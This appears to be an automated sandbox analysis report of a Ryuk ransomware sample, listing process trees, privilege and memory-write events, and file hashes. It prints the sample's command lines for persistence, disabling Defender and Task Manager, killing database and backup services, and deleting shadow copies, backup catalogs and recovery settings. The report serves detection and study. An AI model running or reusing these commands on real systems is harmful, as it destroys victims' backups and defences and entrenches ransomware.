N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1468 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1416 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 296 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 296 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 296 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1936 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 1136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1780 wrote to memory of 288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1924 wrote to memory of 832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

Network

N/A

Files

memory/1416-54-0x0000000000000000-mapping.dmp

memory/1776-55-0x0000000000000000-mapping.dmp

memory/1376-56-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/1064-58-0x0000000000000000-mapping.dmp

memory/296-59-0x0000000000000000-mapping.dmp

memory/592-60-0x0000000000000000-mapping.dmp

memory/1936-61-0x0000000000000000-mapping.dmp

memory/1368-62-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/464-64-0x0000000000000000-mapping.dmp

memory/1136-65-0x0000000000000000-mapping.dmp

memory/1780-66-0x0000000000000000-mapping.dmp

memory/288-67-0x0000000000000000-mapping.dmp

memory/1924-68-0x0000000000000000-mapping.dmp

memory/832-69-0x0000000000000000-mapping.dmp

memory/1672-70-0x0000000000000000-mapping.dmp

memory/1556-71-0x0000000000000000-mapping.dmp

memory/1840-72-0x0000000000000000-mapping.dmp

memory/616-73-0x0000000000000000-mapping.dmp

memory/1392-75-0x0000000000000000-mapping.dmp

memory/1100-74-0x0000000000000000-mapping.dmp

memory/984-76-0x0000000000000000-mapping.dmp

memory/1096-79-0x0000000000000000-mapping.dmp

memory/2004-78-0x0000000000000000-mapping.dmp

memory/844-77-0x0000000000000000-mapping.dmp

memory/2040-80-0x0000000000000000-mapping.dmp

memory/1760-83-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

memory/1968-84-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

C:\ProgramData\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

memory/1012-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 85a6d10468885323e5dc2549da732a02
SHA1 60b074142818f87396012ba26b18cf17108210f8
SHA256 07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA512 4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

C:\ProgramData\RYUKID

MD5 85a6d10468885323e5dc2549da732a02
SHA1 60b074142818f87396012ba26b18cf17108210f8
SHA256 07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA512 4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

C:\ProgramData\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

C:\ProgramData\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

memory/1516-91-0x0000000000000000-mapping.dmp

memory/1736-93-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 23cb6bce418d720b600fb36625cea4df
SHA1 8f4018131e41187445688df8cbda01119efff157
SHA256 4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136
SHA512 18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

